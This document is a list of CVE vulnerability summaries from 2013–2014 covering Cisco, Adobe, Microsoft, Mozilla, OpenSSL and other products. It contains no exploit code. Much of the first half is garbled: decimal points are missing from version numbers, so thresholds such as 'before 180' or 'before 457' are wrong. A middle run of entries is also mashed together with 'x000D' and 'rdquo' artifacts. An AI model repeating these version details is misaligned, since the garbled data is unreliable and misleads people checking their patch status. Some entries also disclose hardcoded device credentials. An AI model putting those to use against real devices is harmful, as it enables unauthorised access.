SQL injection vulnerability in the Agent-Handler component in McAfee ePolicy Orchestrator (ePO) before 457 and 46x before 466 allows remote attackers to execute arbitrary SQL commands via a crafted request over the Agent-Server communication channel.

CVE-2013-0149
The OSPF implementation in Cisco IOS 120 through 124 and 150 through 153, IOS-XE 2x through 39xS, ASA and PIX 7x through 91, FWSM, NX-OS, and StarOS before 14050488 does not properly validate Link State Advertisement (LSA) type 1 packets before performing operations on the LSA database, which allows remote attackers to cause a denial of service (routing disruption) or obtain sensitive packet information via a (1) unicast or (2) multicast packet, aka Bug IDs CSCug34485, CSCug34469, CSCug39762, CSCug63304, and CSCug39795.

CVE-2013-0172
Samba 40x before 401, in certain Active Directory domain-controller configurations, does not properly interpret Access Control Entries that are based on an objectClass, which allows remote authenticated users to bypass intended restrictions on modifying LDAP directory objects by leveraging (1) objectClass access by a user, (2) objectClass access by a group, or (3) write access to an attribute.

CVE-2013-0174
The external node classifier (ENC) API in Foreman before 11 allows remote attackers to obtain the hashed root password via an API request.

CVE-2013-0199
The default LDAP ACIs in FreeIPA 30 before 312 do not restrict access to the (1) ipaNTTrustAuthIncoming and (2) ipaNTTrustAuthOutgoing attributes, which allow remote attackers to obtain the Cross-Realm Kerberos Trust key via unspecified vectors.

CVE-2013-0253
The default configuration of Apache Maven 304, when using Maven Wagon 21, disables SSL certificate checks, which allows remote attackers to spoof servers via a man-in-the-middle (MITM) attack.

CVE-2013-0270
OpenStack Keystone Grizzly before 20131, Folsom, and possibly earlier allows remote attackers to cause a denial of service (CPU and memory consumption) via a large HTTP request, as demonstrated by a long tenant name when requesting a token.

CVE-2013-0481
The console in IBM Sterling B2B Integrator 51 and 52 and Sterling File Gateway 21 and 22 allows remote attackers to read stack traces by triggering (1) an error or (2) an exception.

CVE-2013-0598
Cross-site request forgery (CSRF) vulnerability in the Web Client in IBM Rational ClearQuest 71 before 71212, 80 before 8008, and 801 before 8011 allows remote attackers to hijack the authentication of arbitrary users.

CVE-2013-0619
Adobe Reader and Acrobat 9x before 953, 10x before 1015, and 11x before 1101 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2012-1530, CVE-2013-0601, CVE-2013-0605, CVE-2013-0616, CVE-2013-0620, and CVE-2013-0623.

CVE-2013-0633
Buffer overflow in Adobe Flash Player before 10318351 and 11x before 115502149 on Windows and Mac OS X, before 10318351 and 11x before 112202262 on Linux, before 11111132 on Android 2x and 3x, and before 11111537 on Android 4x allows remote attackers to execute arbitrary code via crafted SWF content, as exploited in the wild in February 2013.

CVE-2013-0649
Use-after-free vulnerability in Adobe Flash Player before 10318363 and 11x before 116602168 on Windows, before 10318361 and 11x before 116602167 on Mac OS X, before 10318361 and 11x before 112202270 on Linux, before 11111143 on Android 2x and 3x, and before 11111547 on Android 4x; Adobe AIR before 360597; and Adobe AIR SDK before 360599 allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2013-0644 and CVE-2013-1374.

CVE-2013-0746
Mozilla Firefox before 180, Firefox ESR 10x before 10012 and 17x before 1702, Thunderbird before 1702, Thunderbird ESR 10x before 10012 and 17x before 1702, and SeaMonkey before 215 do not properly implement quickstubs that use the jsval data type for their return values, which allows remote attackers to execute arbitrary code or cause a denial of service (compartment mismatch and application crash) via crafted JavaScript code that is not properly handled during garbage collection.

CVE-2013-0753
Use-after-free vulnerability in the serializeToStream implementation in the XMLSerializer component in Mozilla Firefox before 180, Firefox ESR 10x before 10012 and 17x before 1702, Thunderbird before 1702, Thunderbird ESR 10x before 10012 and 17x before 1702, and SeaMonkey before 215 allows remote attackers to execute arbitrary code via crafted web content.

CVE-2013-0787
Use-after-free vulnerability in the nsEditor::IsPreformatted function in editor/libeditor/base/nsEditor.cpp in Mozilla Firefox before 1902, Firefox ESR 17x before 1704, Thunderbird before 1704, Thunderbird ESR 17x before 1704, and SeaMonkey before 2161 allows remote attackers to execute arbitrary code via vectors involving an execCommand call.

CVE-2013-0909
The XSS Auditor in Google Chrome before 2501364152 allows remote attackers to obtain sensitive HTTP Referer information via unspecified vectors.

CVE-2013-1035
The iTunes ActiveX control in Apple iTunes before 111 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site.

CVE-2013-1102
The Wireless Intrusion Prevention System (wIPS) component on Cisco Wireless LAN Controller (WLC) devices with software 70 before 70235071, 72 before 721100, and 73 before 731010 allows remote attackers to cause a denial of service (device reload) via crafted IP packets, aka Bug ID CSCtx80743.

CVE-2013-1140
The XML parser in Cisco Security Monitoring, Analysis, and Response System (MARS) allows remote attackers to read arbitrary files via an external entity declaration in conjunction with an entity reference, related to an XML External Entity (XXE) issue, aka Bug ID CSCue55093.


CVE-2013-1144
Memory leak in the IKEv1 implementation in Cisco IOS 151 allows remote attackers to cause a denial of service (memory consumption) via unspecified (1) IPv4 or (2) IPv6 IKE packets, aka Bug ID CSCth81055.

CVE-2013-1153
Cross-site request forgery (CSRF) vulnerability in the web interface in Cisco Prime Infrastructure allows remote attackers to hijack the authentication of arbitrary users, aka Bug ID CSCue84676.

CVE-2013-1181
Cisco NX-OS on Nexus 5500 devices 4x and 5x before 50(3)N2(2), Nexus 3000 devices 5x before 50(3)U3(2), and Unified Computing System (UCS) 6200 devices before 20(1w) allows remote attackers to cause a denial of service (device reload) by sending a jumbo packet to the management interface, aka Bug IDs CSCtx17544, CSCts10593, and CSCtx95389.

CVE-2013-1303
"Use-after-free vulnerability in Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code via a crafted web site that triggers access to a deleted object, aka "Internet Explorer Use After Free Vulnerability," a different vulnerability than CVE-2013-1304 and CVE-2013-1338."

CVE-2013-1384
Adobe Shockwave Player before 1202122 allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-1386.

CVE-2013-1388
Unspecified vulnerability in Adobe ColdFusion 90 before Update 10, 901 before Update 9, 902 before Update 4, and 10 before Update 9 allows attackers to obtain administrator-console access via unknown vectors.

CVE-2013-1450
Microsoft Internet Explorer 8 and 9, when the Proxy Settings configuration has the same Proxy address and Port values in the HTTP and Secure rows, does not properly reuse TCP sessions to the proxy server, which allows remote attackers to obtain sensitive information intended for a specific host via a crafted HTML document that triggers many HTTPS requests and then triggers an HTTP request to that host, as demonstrated by reading a Cookie header, aka MSRC 12096gd.

CVE-2013-1472
Unspecified vulnerability in the JavaFX component in Oracle Java SE JavaFX 224 and earlier allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors, a different vulnerability than other CVEs listed in the February 2013 CPU.

CVE-2013-1553
Unspecified vulnerability in the Oracle Web Services Manager component in Oracle Fusion Middleware 111160 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Web Services Security.

CVE-2013-1620
The TLS implementation in Mozilla Network Security Services (NSS) does not properly consider timing side-channel attacks on a noncompliant MAC check operation during the processing of malformed CBC padding, which allows remote attackers to conduct distinguishing attacks and plaintext-recovery attacks via statistical analysis of timing data for crafted packets, a related issue to CVE-2013-0169.

CVE-2013-1627
Absolute path traversal vulnerability in NTWebServer.exe in Indusoft Studio 70 and earlier and Advantech Studio 70 and earlier allows remote attackers to read arbitrary files via a full pathname in an argument to the sub_401A90 CreateFileW function.

CVE-2013-1638
Opera before 1213 allows remote attackers to execute arbitrary code via crafted clipPaths in an SVG document.

CVE-2013-1669
Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 210 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2013-1676
The SelectionIterator::GetNextSegment function in Mozilla Firefox before 210, Firefox ESR 17x before 1706, Thunderbird before 1706, and Thunderbird ESR 17x before 1706 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds read) via unspecified vectors.

CVE-2013-1700
The Mozilla Maintenance Service in Mozilla Firefox before 220 on Windows does not properly handle inability to launch the Mozilla Updater executable file, which allows local users to gain privileges via vectors involving placement of a Trojan horse executable file at an arbitrary location.

CVE-2013-1734
Cross-site request forgery (CSRF) vulnerability in attachment.cgi in Bugzilla 2x, 3x, and 40x before 4011; 41x and 42x before 427; and 43x and 44x before 441 allows remote attackers to hijack the authentication of arbitrary users for requests that commit an attachment change via an update action.

CVE-2013-1777
The JMX Remoting functionality in Apache Geronimo 3x before 301, as used in IBM WebSphere Application Server (WAS) Community Edition 3003 and other products, does not properly implement the RMI classloader, which allows remote attackers to execute arbitrary code by using the JMX connector to send a crafted serialized object.

CVE-2013-2319
FileMaker Pro before 12 and Pro Advanced before 12 does not verify X509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-2340
Unspecified vulnerability on the HP ProCurve JCA, JCB, JDA, JDB, JEA, JFA, JFB, JFC, JGA, 658250-B21, and 658247-B21; HP 3COM routers and switches; and HP H3C routers and switches allows remote attackers to execute arbitrary code or obtain sensitive information via unknown vectors.

CVE-2013-2350
Unspecified vulnerability in HP Storage Data Protector 62X allows remote attackers to execute arbitrary code or cause a denial of service via unknown vectors, aka ZDI-CAN-1897.

CVE-2013-2492
Stack-based buffer overflow in Firebird 213 through 215 before 18514 and 251 through 253 before 26623 on Windows allows remote attackers to execute arbitrary code via a crafted packet to TCP port 3050, related to a missing size check during extraction of a group number from CNCT information.

CVE-2013-2507
Multiple cross-site scripting (XSS) vulnerabilities in the Brother MFC-9970CDW printer with firmware G (103) allow remote attackers to inject arbitrary web script or HTML via the (1) id parameter to admin/log_to_net.html or (2) kind parameter to fax/copy_settings.html, a different vulnerability than CVE-2013-2670 and CVE-2013-2671.

CVE-2013-2736
Adobe Reader and Acrobat 9x before 955, 10x before 1017, and 11x before 11003 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, CVE-2013-2735, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, and CVE-2013-3341.

CVE-2013-2780
Siemens SIMATIC S7-1200 PLCs 2x and 3x allow remote attackers to cause a denial of service (defect-mode transition and control outage) via crafted packets to UDP port 161 (aka the SNMP port).

CVE-2013-2803
ProSoft RadioLinx ControlScape before 600040 uses a deficient PRNG algorithm and seeding strategy for passphrases, which makes it easier for remote attackers to obtain access via a brute-force attack.

CVE-2013-2824
Schneider Electric StruxureWare SCADA Expert Vijeo Citect 740, Vijeo Citect 720 through 730SP1, CitectSCADA 720 through 730SP1, StruxureWare PowerSCADA Expert 730 through 730SR1, and PowerLogic SCADA 720 through 720SR1 do not properly handle exceptions, which allows remote attackers to cause a denial of service via a crafted packet.

CVE-2013-2826
WellinTech KingSCADA before 312, KingAlarm&Event before 31, and KingGraphic before 312 perform authentication on the KAEClientManager console rather than on the server, which allows remote attackers to bypass intended access restrictions and discover credentials via a crafted packet to TCP port 8130.

CVE-2013-2920
The DoResolveRelativeHost function in url/url_canon_relative.cc in Google Chrome before 300159966 allows remote attackers to cause a denial of service (out-of-bounds read) via a relative URL containing a hostname, as demonstrated by a protocol-relative URL beginning with a www.google.com substring.

CVE-2013-3064
Open redirect vulnerability in ui/dynamic/unsecured.html in Linksys EA6500 with firmware 1128147876 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the target parameter.

CVE-2013-3116
"Microsoft Internet Explorer 7 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability.""

CVE-2013-3137
"Microsoft FrontPage 2003 SP3 does not properly parse DTDs, which allows remote attackers to obtain sensitive information via crafted XML data in a FrontPage document, aka "XML Disclosure Vulnerability.""

CVE-2013-3194
"Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability.""

CVE-2013-3199
"Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability.""

CVE-2013-3201
"Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3203, CVE-2013-3206, CVE-2013-3207, and CVE-2013-3209."

CVE-2013-3206
"Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2013-3201, CVE-2013-3203, CVE-2013-3207, and CVE-2013-3209."

CVE-2013-3280
EMC RSA Authentication Agent 71x before 712 for Web for Internet Information Services has a fail-open design, which allows remote attackers to bypass intended access restrictions via vectors that trigger an agent crash.

CVE-2013-3387
Cisco Prime Central for Hosted Collaboration Solution (HCS) Assurance 86 and 9x before 92(1) allows remote attackers to cause a denial of service (disk consumption) via a flood of TCP packets to port 5400, leading to large error-log files, aka Bug ID CSCua42724.

CVE-2013-3417
The administrative web interface in Cisco Video Surveillance Operations Manager does not properly perform authentication, which allows remote attackers to watch video feeds via a crafted URL, aka Bug ID CSCtg72262.

CVE-2013-3632The Cron service in rpcphp inOpenMediaVault allows remote x000Dauthenticated users to execute cron jobs asarbitrary users and x000D execute arbitrarycommands via the username parameter

CVE-2013-3656Cybozu Office 910 and earlier doesnot properly manage sessions x000Dwhich allows remote attackers to bypassauthentication by leveraging x000Dknowledge of a login URL

CVE-2013-3856rdquoMicrosoft Word 2003 SP3 and WordViewer allow remote attackers to x000Dexecute arbitrary code or cause a denialof service (memory x000D corruption)via a crafted Office document akardquordquoWord Memory Corruption x000DVulnerabilityrdquordquordquo

CVE-2013-3860rdquoMicrosoft NET Framework 20 SP2 3535 SP1 351 4 and 45 does x000Dnot properly parse a DTD during XMLdigital-signature validation x000D whichallows remote attackers to cause adenial of service x000D (application crashor hang) via a crafted signed XMLdocument aka x000D rdquordquoEntity ExpansionVulnerabilityrdquordquordquo

CVE-2013-3893Use-after-free vulnerability in theSetMouseCapture implementationin x000D mshtmldll in MicrosoftInternet Explorer 6 through 11 allowsremote x000D attackers to executearbitrary code via crafted JavaScript stringsas x000D demonstrated by use of an ms-help URL that triggers loading of x000Dhxdsdll

CVE-2013-3897rdquoUse-after-free vulnerability in theCDisplayPointer class in mshtmldll in

Microsoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via crafted JavaScript code thatuses the onpropertychange event handleras exploited in the wild in September andOctober 2013 aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo

CVE-2013-3900rdquoThe WinVerifyTrust function in MicrosoftWindows XP SP2 and SP3 Windows Server2003 SP2 Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and Windows RTGold and 81 does not properly validate PEfile digests during Authenticode signatureverification which allows remote attackersto execute arbitrary code via a craftedPE file aka rdquordquoWinVerifyTrust SignatureValidation Vulnerabilityrdquordquordquo

CVE-2013-3905rdquoMicrosoft Outlook 2007 SP3 2010 SP1and SP2 2013 and 2013 RT does x000Dnot properly expand metadata containedin SMIME certificates which x000Dallows remote attackers to obtain sensitivenetwork configuration and x000D stateinformation via a crafted certificate in an e-mail message aka x000D rdquordquoSMIME AIAVulnerabilityrdquordquordquo

CVE-2013-4223The Gentoo Nullmailer package before 111-r2 uses world-readable x000D permissionsfor etcnullmailerremotes which allowslocal users to x000D obtain SMTPauthentication credentials by reading thefile

CVE-2013-4436The default configuration for salt-ssh inSalt (aka SaltStack) 0170 x000D doesnot validate the SSH host key of requestswhich allows remote x000D attackers tohave unspecified impact via a man-in-the-middle (MITM) x000D attack

CVE-2013-4478Sup before 01321 and 014x before01411 allows remote attackers x000Dto execute arbitrary commands via shellmetacharacters in the filename x000D ofan email attachment

CVE-2013-4529Buffer overflow in hwpcipcie aerc inQEMU before 172 allows x000D remoteattackers to cause a denial of service andpossibly execute x000D arbitrary code viaa large log num value in a savevm image

CVE-2013-4555Cross-site request forgery(CSRF) vulnerability in x000Decrireactionlogoutphp in SPIP before2124 allows remote attackers x000D tohijack the authentication of arbitrary usersfor requests that x000D logout the uservia unspecified vectors

CVE-2013-4776NETGEAR ProSafe GS724Tv3 andGS716Tv2 with firmware 54113and x000D earlier GS748Tv454114 and GS510TP 5044 allowsremote x000D attackers to cause adenial of service (reboot or crash) viaa crafted x000D HTTP request tofilesystem

CVE-2013-4782: The Supermicro BMC implementation allows remote attackers to bypass authentication and execute arbitrary IPMI commands by using cipher suite 0 (aka cipher zero) and an arbitrary password.

CVE-2013-5057: hxds.dll in Microsoft Office 2007 SP3 and 2010 SP1 and SP2 does not implement the ASLR protection mechanism, which makes it easier for remote attackers to execute arbitrary code via a crafted COM component on a web site that is visited with Internet Explorer, as exploited in the wild in December 2013, aka "HXDS ASLR Vulnerability."

CVE-2013-5369: IBM SPSS Analytical Decision Management 6.1 before IF1, 6.2 before IF1, and 7.0 before FP1 IF6 might allow remote attackers to execute arbitrary code by deploying and accessing a service.

CVE-2013-5428: IBM WebSphere DataPower XC10 appliances 2.5.0 do not require authentication for all administrative actions, which allows remote attackers to cause a denial of service via unspecified vectors.

CVE-2013-5431: Open redirect vulnerability in IBM Tivoli Federated Identity Manager (TFIM) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 and Tivoli Federated Identity Manager Business Gateway (TFIMBG) 6.1.1 before IF 15, 6.2.0 before IF 14, 6.2.1, and 6.2.2 before IF 8 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.

CVE-2013-5494: Cross-site request forgery (CSRF) vulnerability in the web framework in Cisco Unified MeetingPlace Solution, as used in Unified MeetingPlace Web Conferencing and Unified MeetingPlace, allows remote attackers to hijack the authentication of arbitrary users, aka Bug IDs CSCui45209 and CSCui44674.

CVE-2013-5507: The IPsec implementation in Cisco Adaptive Security Appliance (ASA) Software 9.1 before 9.1(1.7), when an IPsec VPN tunnel is enabled, allows remote attackers to cause a denial of service (device reload) via a (1) ICMP or (2) ICMPv6 packet that is improperly handled during decryption, aka Bug ID CSCue18975.

CVE-2013-5536: Cisco Secure Access Control System (ACS) does not properly implement an incoming-packet firewall rule, which allows remote attackers to cause a denial of service (process crash) via a flood of crafted packets, aka Bug ID CSCui51521.

CVE-2013-5559: Buffer overflow in the Active Template Library (ATL) framework in the VPNAPI COM module in Cisco AnyConnect Secure Mobility Client 2.x allows user-assisted remote attackers to execute arbitrary code via a crafted HTML document, aka Bug ID CSCuj58139.

CVE-2013-5561: The Safe Search enforcement feature in Cisco Adaptive Security Appliance (ASA) CX Context-Aware Security Software does not properly perform filtering, which allows remote attackers to bypass intended policy restrictions via unspecified vectors, aka Bug ID CSCui94622.

CVE-2013-5751: Directory traversal vulnerability in SAP NetWeaver 7.x allows remote attackers to read arbitrary files via unspecified vectors.

CVE-2013-5757: Absolute path traversal vulnerability in Yealink VoIP Phone SIP-T38G allows remote authenticated users to read arbitrary files via a full pathname in the dumpConfigFile function in the command parameter to cgi-bin/cgiServer.exx.

CVE-2013-5828: Unspecified vulnerability in the Enterprise Manager Base Platform component in Oracle Enterprise Manager Grid Control EM Base Platform 10.2.0.5 and 11.1.0.1, EM DB Control 11.1.0.7, 11.2.0.2, and 11.2.0.3, and EM Plugin for DB 12.1.0.2 and 12.1.0.3 allows remote attackers to affect integrity via unknown vectors related to Storage Management.

CVE-2013-6167: Mozilla Firefox through 27 sends HTTP Cookie headers without first validating that they have the required character-set restrictions, which allows remote attackers to conduct the equivalent of a persistent Logout CSRF attack via a crafted parameter that forces a web application to set a malformed cookie within an HTTP response.

CVE-2013-6188: Cross-site request forgery (CSRF) vulnerability in HP System Management Homepage (SMH) 7.1 through 7.2.2 allows remote attackers to hijack the authentication of unspecified victims via unknown vectors.

CVE-2013-6284: Unspecified vulnerability in the Statutory Reporting for Insurance (FS SR) component in the Financial Services module for SAP ERP Central Component (ECC) allows attackers to execute arbitrary code via unspecified vectors, related to a "code injection vulnerability."

CVE-2013-6396: The OpenStack Python client library for Swift (python-swiftclient) 1.0 through 1.9.0 does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2013-6475: Multiple integer overflows in (1) OPVPOutputDev.cxx and (2) oprs/OPVPSplash.cxx in the pdftoopvp filter in CUPS and cups-filters before 1.0.47 allow remote attackers to execute arbitrary code via a crafted PDF file, which triggers a heap-based buffer overflow.

CVE-2013-6660: The drag-and-drop implementation in Google Chrome before 33.0.1750.117 does not properly restrict the information in WebDropData data structures, which allows remote attackers to discover full pathnames via a crafted web site.

CVE-2013-6699: The Control and Provisioning of Wireless Access Points (CAPWAP) protocol implementation on Cisco Wireless LAN Controller (WLC) devices allows remote attackers to cause a denial of service via a crafted CAPWAP packet that triggers a buffer over-read, aka Bug ID CSCuh81880.

CVE-2013-6702: The management implementation on Cisco ONS 15454 controller cards with software 9.8 and earlier allows remote attackers to cause a denial of service (card reset) via crafted packets, aka Bug ID CSCtz50902.

CVE-2013-6979: The VTY authentication implementation in Cisco IOS XE 03.02.xx.SE and 03.03.xx.SE incorrectly relies on the Linux-IOS internal-network configuration, which allows remote attackers to bypass authentication by leveraging access to a 192.168.x.2 source IP address, aka Bug ID CSCuj90227.

CVE-2013-6994: OpenText Exceed OnDemand (EoD) 8 transmits the session ID in cleartext, which allows remote attackers to perform session fixation attacks by sniffing the network.

CVE-2013-7004: D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 have a hardcoded account of username gkJ9232xXyruTRmY, which makes it easier for remote attackers to obtain access by leveraging knowledge of the username.

CVE-2013-7043: Multiple cross-site request forgery (CSRF) vulnerabilities on Cisco Scientific Atlanta DPR2320R2 routers with software 2.0.2r1262-090417 allow remote attackers to hijack the authentication of administrators for requests that (1) change a password via the Password parameter to goform/RgSecurity, (2) reboot the device via the Restart parameter to goform/restart, (3) modify Wi-Fi settings, as demonstrated by the WpaPreSharedKey parameter to goform/wlanSecurity, or (4) modify parental controls via the ParentalPassword parameter to goform/RgParentalBasic.

CVE-2013-7389: Multiple cross-site scripting (XSS) vulnerabilities in D-Link DIR-645 Router (Rev. A1) with firmware before 1.04B11 allow remote attackers to inject arbitrary web script or HTML via the (1) deviceid parameter to parentalcontrols/bind.php, (2) RESULT parameter to info.php, or (3) receiver parameter to bsc_sms_send.php.

CVE-2014-0001: Buffer overflow in client/mysql.cc in Oracle MySQL and MariaDB before 5.5.35 allows remote database servers to cause a denial of service (crash) and possibly execute arbitrary code via a long server version string.

CVE-2014-0035: The SymmetricBinding in Apache CXF before 2.6.13 and 2.7.x before 2.7.10, when EncryptBeforeSigning is enabled and the UsernameToken policy is set to an EncryptedSupportingToken, transmits the UsernameToken in cleartext, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-0160: The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.

CVE-2014-0207: The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.

CVE-2014-0259: Microsoft Word 2007 SP3 and Office Compatibility Pack SP3 allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted Office document, aka "Word Memory Corruption Vulnerability."

CVE-2014-0266: The XMLHTTP ActiveX controls in XML Core Services 3.0 in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to bypass the Same Origin Policy via a web page that is visited in Internet Explorer, aka "MSXML Information Disclosure Vulnerability."

CVE-2014-0294: Microsoft Forefront Protection 2010 for Exchange Server does not properly parse e-mail content, which might allow remote attackers to execute arbitrary code via a crafted message, aka "RCE Vulnerability."

CVE-2014-0313: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability," a different vulnerability than CVE-2014-0321.

CVE-2014-0354: The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 1.00(BFQ.6)C0 has a hardcoded password of qweasdzxc for an unspecified account, which allows remote attackers to obtain index.asp login access via an HTTP request.

CVE-2014-0362: Cross-site scripting (XSS) vulnerability on Google Search Appliance (GSA) devices before 7.0.14.G.216 and 7.2 before 7.2.0.G.114, when dynamic navigation is configured, allows remote attackers to inject arbitrary web script or HTML via input included in a SCRIPT element.

CVE-2014-0433: Unspecified vulnerability in the MySQL Server component in Oracle MySQL 5.6.13 and earlier allows remote attackers to affect availability via unknown vectors related to Thread Pooling.

CVE-2014-0488: APT before 1.0.9 does not "invalidate repository data" when moving from an unauthenticated to authenticated state, which allows remote attackers to have unspecified impact via crafted repository data.

CVE-2014-0493: Adobe Reader and Acrobat 10.x before 10.1.9 and 11.x before 11.0.06 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-0495.

CVE-2014-0494: Adobe Digital Editions 2.0.1 allows attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via unspecified vectors.

CVE-2014-0498: Stack-based buffer overflow in Adobe Flash Player before 11.7.700.269 and 11.8.x through 12.0.x before 12.0.0.70 on Windows and Mac OS X and before 11.2.202.341 on Linux, Adobe AIR before 4.0.0.1628 on Android, Adobe AIR SDK before 4.0.0.1628, and Adobe AIR SDK & Compiler before 4.0.0.1628 allows attackers to execute arbitrary code via unspecified vectors.

CVE-2014-0515: Buffer overflow in Adobe Flash Player before 11.7.700.279 and 11.8.x through 13.0.x before 13.0.0.206 on Windows and OS X, and before 11.2.202.356 on Linux, allows remote attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in April 2014.

CVE-2014-0533: Cross-site scripting (XSS) vulnerability in Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2014-0531 and CVE-2014-0532.

CVE-2014-0536: Adobe Flash Player before 13.0.0.223 and 14.x before 14.0.0.125 on Windows and OS X and before 11.2.202.378 on Linux, Adobe AIR before 14.0.0.110, Adobe AIR SDK before 14.0.0.110, and Adobe AIR SDK & Compiler before 14.0.0.110 allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors.

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)."

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion," a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

